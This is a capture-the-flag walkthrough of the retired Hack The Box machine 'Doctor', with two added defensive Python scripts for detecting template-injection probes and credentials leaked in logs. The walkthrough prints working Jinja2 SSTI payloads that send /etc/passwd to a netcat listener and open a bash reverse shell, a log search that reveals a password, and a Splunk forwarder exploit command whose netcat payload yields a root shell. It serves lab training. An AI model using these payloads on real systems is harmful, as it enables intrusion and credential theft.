HTB Walkthrough: Doctor w/o Metasploit (retired)

Shraddha M.
Jun 1, 2021

Doctor is a retired box on HTB and is part of TJ Null's list of OSCP-like boxes.

Hostname: Doctor | Difficulty Level: Easy | Operating System: Linux

Nmap Scan

# Nmap 7.91 scan initiated Thu May 27 10:45:26 2021 as:
nmap -sC -sV -oA Doctor 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

Browsing to http://10.10.10.209/ reveals the email address 'info@doctors.htb'. Add 'doctors.htb' to /etc/hosts. Browsing to 'http://doctors.htb/' shows a login page. The source of the login page contains an HTML comment that reveals a '/archive' directory. Browsing to it shows a blank page, but viewing the page source shows that it is an XML document.

<!-- archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a> -->

Create a user through the login page.

Create a new message in the portal and check whether it has any effect on the http://doctors.htb/archive page: the title of the message is displayed there. This hints that the portal may be vulnerable to SSTI. Refer to this link for more information: https://portswigger.net/research/server-side-template-injection

Exploitation

(a) Confirm whether the title field is vulnerable to SSTI with the input: ${7*7}
(b) Check the SSTI engine type with the input: {{7*7}}
(c) Confirm the engine is Jinja2 with the input: {{7*'7'}}

Searching for 'jinja2 exploit' leads to: https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

(d) Read /etc/passwd and send it to a netcat listener on port 1337 with the input:

{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('cat /etc/passwd | nc <Kali IP> 1337')['read']() == 'chiv' %} a {% endif %}

(e) Getting a reverse shell:

{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('bash -c "bash -i >& /dev/tcp/<Kali IP>/9876 0>&1"')['read']() == 'chiv' %} a {% endif %}

Open a netcat listener on Kali on port 9876 and you will receive a reverse shell.
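The probe sequence in steps (a)-(c) is a small decision tree: `${7*7}` evaluating to 49 points away from Jinja2, `{{7*7}}` evaluating to 49 confirms that a `{{ }}`-style engine is rendering the input, and `{{7*'7'}}` separates Python-backed Jinja2 (string repetition gives `7777777`) from Twig (which coerces the string and gives 49). The following Python is an added example, not code from the original post: it encodes that decision tree and, for the defender side, scans a few constructed application log lines for the template-syntax probes that precede this kind of attack. The log lines, field names and the `infer_engine` return strings are all assumptions made for the example.

```python
import re

# Template-expression probes rarely appear in legitimate message titles, so a
# defender can flag them in application logs or WAF captures.
TEMPLATE_PROBE = re.compile(r"(\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|<%.*?%>)", re.S)


def find_template_probes(text):
    """Return every template-like expression found in a user-supplied field."""
    return TEMPLATE_PROBE.findall(text)


def infer_engine(responses):
    """Apply the walkthrough's probe logic (steps a-c).

    `responses` maps each probe string to the text the application echoed
    back for it (e.g. what appeared on the /archive page).
    """
    # Step (a): ${7*7} -> 49 means a ${...}-syntax engine such as FreeMarker
    # or Mako is evaluating input; Jinja2 would echo the literal text.
    if responses.get("${7*7}") == "49":
        return "a ${...}-syntax engine (FreeMarker, Mako, ...); not Jinja2"
    # Step (b): if {{7*7}} is not evaluated, nothing is being rendered.
    if responses.get("{{7*7}}") != "49":
        return "no evaluation observed"
    # Step (c): string multiplication distinguishes Python from PHP semantics.
    out = responses.get("{{7*'7'}}")
    if out == "7777777":
        return "Jinja2 (Python semantics)"
    if out == "49":
        return "Twig (PHP semantics)"
    return "unknown: {{7*7}} evaluated but {{7*'7'}} result unrecognised"


# Constructed log lines (not from the box) in a hypothetical "title=" format.
SAMPLE_LOG = [
    "2021-05-29T17:30:01 user=alice title=Appointment reminder",
    "2021-05-29T17:31:12 user=bob title=${7*7}",
    "2021-05-29T17:31:40 user=bob title={{7*7}}",
    "2021-05-29T17:32:05 user=bob title={% if 1 %} a {% endif %}",
]


def scan_log(lines):
    """Return (line, probes) pairs for every log line containing a probe."""
    hits = []
    for line in lines:
        probes = find_template_probes(line)
        if probes:
            hits.append((line, probes))
    return hits


if __name__ == "__main__":
    for line, probes in scan_log(SAMPLE_LOG):
        print("possible SSTI probe:", probes, "in", line)
    observed = {"${7*7}": "${7*7}", "{{7*7}}": "49", "{{7*'7'}}": "7777777"}
    print("engine:", infer_engine(observed))
```

The `scan_log` pass is what an analyst would run over the portal's own logs after the fact; the three probes in steps (a)-(c) are exactly the strings it flags, so an alert on them gives early warning well before the `__import__('os')` payload is attempted.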

web@doctor:~$ pwd
pwd
/home/web

Escalation to user 'shaun':

We need to escalate our privileges to the user 'shaun' to get the user flag.

web@doctor:/home$ ls -la
drwxr-xr-x 6 shaun shaun 4096 Sep 15 2020 shaun
drwxr-xr-x 6 web web 4096 Sep 28 2020 web

Looking for passwords in the log files:

web@doctor:/dev/shm$ grep -R "password" /var/log/ >> /dev/shm/out.txt

Interesting entries:
/var/log/syslog.1:May 29 17:28:58 doctor kernel: [ 5.141606] systemd[1]: Started Forward Password Requests to Plymouth Directory Watch.
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

It looks like the user entered a password into the email field instead of an email address. Checking whether this password works for user 'shaun' gives us a shell as shaun and the user flag.
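The backup log above is a reminder that web server access logs readily capture credentials when they end up in a URL, and that a password typed into the wrong field is just as exposed as a `password=` parameter. The following Python is an added example, not part of the original post: it parses Apache-style access log lines with the standard library, splits the query string, and flags both sensitive parameter names and non-email values submitted in an `email` field on a password-reset endpoint. The sample log lines are constructed for the example and do not come from the box.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache common/combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Parameter names that should never appear in a URL (and therefore in access logs).
SENSITIVE_KEYS = {"password", "passwd", "pwd", "pass", "token", "secret", "otp"}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def parse_line(line):
    """Split one access log line into its request components, or return None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "method": m.group("method"),
        "path": parts.path,
        "params": dict(parse_qsl(parts.query, keep_blank_values=True)),
        "status": int(m.group("status")),
    }


def find_credential_leaks(lines):
    """Return (time, path, parameter, reason) tuples for suspicious requests."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"].items():
            k = key.lower()
            if k in SENSITIVE_KEYS and value:
                findings.append((rec["time"], rec["path"], key, "sensitive parameter in URL"))
            elif k == "email" and value and not EMAIL_RE.match(value):
                # The Doctor case: a password typed into the email field of /reset_password.
                findings.append((rec["time"], rec["path"], key, "non-email value in email field"))
    return findings


# Constructed sample lines (hypothetical hosts, times and values).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Sep/2020:11:15:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.68.0"',
    '10.0.0.5 - - [05/Sep/2020:11:16:10 +0000] "POST /reset_password?email=alice%40doctors.htb HTTP/1.1" 200 453 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Sep/2020:11:17:34 +0000] "POST /reset_password?email=NotAnEmail1 HTTP/1.1" 500 453 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Sep/2020:11:18:20 +0000] "GET /login?user=bob&password=hunter2 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for time, path, key, reason in find_credential_leaks(SAMPLE_LOG):
        print(f"[{time}] {path} param={key}: {reason}")
```

Running this over rotated logs and backups (the hit here was in /var/log/apache2/backup, not the live log) is the point: a world-readable copy of an old access log keeps a leaked secret alive long after the request itself was forgotten. The durable fix is to keep credentials out of URLs entirely, since query strings are logged by default, and to restrict read access to the log directory.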

Privilege Escalation

Looking for services to exploit: the nmap scan showed Splunk listening on port 8089, and it is running with root privileges.

shaun@doctor:/$ ps -aux | grep splunk
ps -aux | grep splunk
root 1140 0.0 2.1 257468 86488 ? Sl 17:29 0:07 splunkd -p 8089 start
root 1142 0.0 0.3 77664 13484 ? Ss 17:29 0:00 [splunkd pid=1140] splunkd -p 8089 start [process-runner]
shaun 2656 0.0 0.0 17668 728 pts/2 S+ 20:37 0:00 grep --color=auto splunk

A Google search for "splunk port 8089" shows that this is the Splunk forwarder service. Searching for 'splunk forwarder exploit' leads to this tool: https://github.com/cnotin/SplunkWhisperer2. Run the exploit with shaun's credentials and open a netcat listener in another Kali tab.

┌──(root💀kali)-[/home/kali/labs/HTB/Doctor]
└─# python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --lhost <Kali IP> --username shaun --password Guitar123 --payload "/bin/nc -e /bin/bash <Kali IP> 9877"
Running in remote mode (Remote Code Execution)
[.] Authenticating…
[+] Authenticated
[.] Creating malicious app bundle…
[+] Created malicious app bundle in: /tmp/tmpe_puwxqd.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://<Kali IP>:8181/
10.10.10.209 - - [29/May/2021 14:53:09] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

The listener on port 9877 receives a root shell, which gives the root flag.
